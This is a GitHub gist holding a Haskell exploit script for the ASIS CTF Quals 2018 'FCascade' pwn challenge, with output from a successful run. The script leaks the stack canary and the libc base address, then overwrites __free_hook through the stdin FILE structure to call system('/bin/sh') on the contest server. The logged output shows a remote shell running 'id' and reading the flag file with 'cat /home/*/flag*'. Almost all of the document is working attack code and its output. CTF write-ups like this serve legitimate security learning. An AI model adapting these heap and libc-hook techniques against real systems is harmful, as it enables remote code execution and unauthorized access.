Skip to content

Instantly share code, notes, and snippets.

@Tosainu
Created April 30, 2018 19:01
Show Gist options
  • Save Tosainu/bb325e0cfcf4bdc62f4f0fb72c787724 to your computer and use it in GitHub Desktop.
Save Tosainu/bb325e0cfcf4bdc62f4f0fb72c787724 to your computer and use it in GitHub Desktop.
{-# LANGUAGE OverloadedStrings #-}
-- ASIS CTF Quals 2018: FCascasde
import Control.Monad
import Control.Monad.IO.Class (liftIO)
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Numeric (showHex)
import System.Environment
-- https://github.com/Tosainu/pwn.hs
import Pwn
show' :: (Show a) => a -> BS.ByteString
show' = BS.pack . show
main :: IO ()
main = pwn $ do
args <- liftIO getArgs
let isRemote = "remote" `elem` args
(host, port) = if isRemote then ("178.62.40.102", 6002)
else ("192.168.122.10", 4000)
let libc_puts' = 0x0006f690
libc_system' = 0x00045390
libc___free_hook' = 0x003c67a8
libc___libc_start_main' = 0x00020740
libc_main_arena' = 0x3c4b20
libc__IO_2_1_stdin' = 0x003c48e0
r <- remote host port
info "leak informations"
recvuntil r "> "
sendline r "11010110"
let dropAndUnpack n1 n2 s =
let s1 = BS.drop n1 $ BS.take (BS.length s - n2) s
s2 = if BS.length s1 < 8 then s1 <> BS.replicate (8 - BS.length s1) '\x00'
else BS.take 8 s1
in u64 s2
let offset_canary = 0x88
offset___libc_start_main = 0x98
recvuntil r "> "
send r $ BS.replicate (offset_canary + 1) 'A'
Just canary' <- dropAndUnpack offset_canary 2 <$> recvuntil r "> "
let canary = complement 0xff .&. canary'
success $ " canary: 0x" <> showHex canary ""
send r $ BS.replicate offset___libc_start_main 'A'
Just libc_base' <- dropAndUnpack offset___libc_start_main 2 <$> recvuntil r "> "
let libc_base = libc_base' - 240 - libc___libc_start_main'
success $ " libc_base: 0x" <> showHex libc_base ""
sendline r "11111111"
recvuntil r "> "
sendline r "10110101"
recvuntil r "> "
sendline r $ BS.replicate 0x700 '0' <> "160"
recvuntil r "> "
sendline r "E"
let alloc n s = do
recvuntil r "> "
sendline r $ show' n
recvuntil r "> "
sendline r s
alloc 10 "a"
alloc 40 "b"
alloc 80 "c"
alloc 100 "d"
alloc 2048 ""
alloc (libc_base + libc__IO_2_1_stdin' + 56 + 1) ""
let buf = BS.concat $ catMaybes
[ p64 $ libc_base + libc__IO_2_1_stdin' + 132
, p64 $ libc_base + libc__IO_2_1_stdin' + 132
, p64 $ libc_base + libc__IO_2_1_stdin' + 132
, p64 $ libc_base + libc___free_hook'
, p64 $ libc_base + libc___free_hook' + 8
]
recvuntil r "> "
send r buf
alloc 10 "10"
recv r
let buf = BS.concat $ catMaybes
[ Just "200\x00\x00\x00\x00\x00"
, Just $ BS.replicate 0xa0 '\x00'
, p64 $ libc_base + libc_system'
]
send r buf
sendline r ";/bin/sh;"
interactive r
-- [x] Opening connection to 178.62.40.102 on port 6002
-- [+] Opening connection to 178.62.40.102 on port 6002: Done
-- [*] leak informations
-- [+] canary: 0xaa16179033420c00
-- [+] libc_base: 0x7fa369381000
-- [*] Entering interactive mode
-- > > sh: 1: Syntax error: ";" unexpected
-- > > id
-- uid=1000(pwn) gid=1000(pwn) groups=1000(pwn)
-- > > cat /home/*/flag*
-- ASIS{1b706201df43717ba2b6a7c41191ec1205fc908d}> > ^C
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment